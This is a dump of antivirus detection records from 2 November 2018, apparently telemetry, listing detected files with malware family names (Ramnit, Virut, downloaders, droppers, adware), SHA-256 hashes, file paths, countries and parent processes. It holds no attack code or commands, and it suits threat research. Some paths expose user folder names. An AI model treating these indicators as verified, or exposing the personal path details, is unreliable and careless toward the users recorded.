  Row(detection=Row(filename='zcnybkxe.htm', filepath='D:\\new backup\\alllllllllllll\\Users\\Baybayan\\AppData\\Local\\Temp\\Low\\ZCNYBKXE.htm', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='310136c1b3d38eec6b3da81ef6576039c576741be8c3836d56cb9b642ecee484', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dialogues.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\dialogues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9a74eb7a-774f-133a-be1b-4104c2aa4dc4.exe', filepath='I:\\{8838958c-4504-1c0f-0f0b-e16bce3325e1}\\9a74eb7a-774f-133a-be1b-4104c2aa4dc4.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T12:51:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cw.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\cw.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt9638.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\U9628.tmp\\UNT9638.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='2125f8fd52552fbd9a9d2f828302c672f5ab14bf17d51c8ad3345ab1dff9a80f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24f7ce4e372d94cb3d91cc79e54cbecebd3b8c8ef4d79b945d0d1eeb8f5ec887', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:22:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ficha eeii  r-889.ppt', filepath='C:\\Users\\X\\Desktop\\SERVIDOR\\CONTRATO BOMBEO\\EQUIPO NORTE\\UP\\PCBMAS\\INF GENERAL\\PCBMAS\\FICHAS CABIMAS\\CABIMAS\\2014\\R-889\\FICHA EEII  R-889.ppt', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055208-6778c001', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055208-6778C001', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192458-2e56bf41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb28184d\\AVSCAN-20181102-192327-25AEC816\\AVSCAN-20181102-192458-2E56BF41', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='5b8c7bfc05c4445a2366993e01e610646f4d7fa5bce5cd80d4dac5071c3814d8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134316-f7e3aa69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134316-F7E3AA69', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:46:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055842-52601720', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055842-52601720', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120353-08c14a42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_da1815cd\\AVSCAN-20181102-120338-05A14DB4\\AVSCAN-20181102-120353-08C14A42', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:03:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133712-b44887a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133712-B44887A1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:40:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150023-6eea4c29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8dc043bc\\AVSCAN-20181102-145927-6765F9A6\\AVSCAN-20181102-150023-6EEA4C29', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='radf3da6.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\radF3DA6.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054252-1c073888', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054252-1C073888', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vurgjreo.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\VurGJreO.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00007664', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00007664', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050325-9933abf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050325-9933ABF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050810-432f71b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050810-432F71B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061247-4a4df4ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061247-4A4DF4EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155637-c6702ce1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155637-C6702CE1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135609-dace10cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd546174\\AVSCAN-20181102-135554-D8D3A0DA\\AVSCAN-20181102-135609-DACE10CC', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111348-28810732', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ba6095e\\AVSCAN-20181102-111324-254BA6F6\\AVSCAN-20181102-111348-28810732', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054628-9d3a19a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054628-9D3A19A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='debit note  (xe 16cho tang cuong).exe', filepath='F:\\\xa0\\DEBIT NOTE  (xe 16cho tang cuong).exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='50bd5d0033280c71a3b24e5f7e56f903bb9c3c47a4caa8577e5c0fae14ce1a61', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062313-bf893939', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062313-BF893939', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151455-f59f8cdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151455-F59F8CDB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055055-3c5bdb8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055055-3C5BDB8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051031-970fd95f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051031-970FD95F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051804-a54049a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051804-A54049A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-717f0430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-717F0430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054658-af1707a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054658-AF1707A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053655-476d326a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053655-476D326A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051850-c0b4303d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051850-C0B4303D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060351-0af09f89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060351-0AF09F89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:50Z'), dt=datetime.date(2018, 11, 2)),
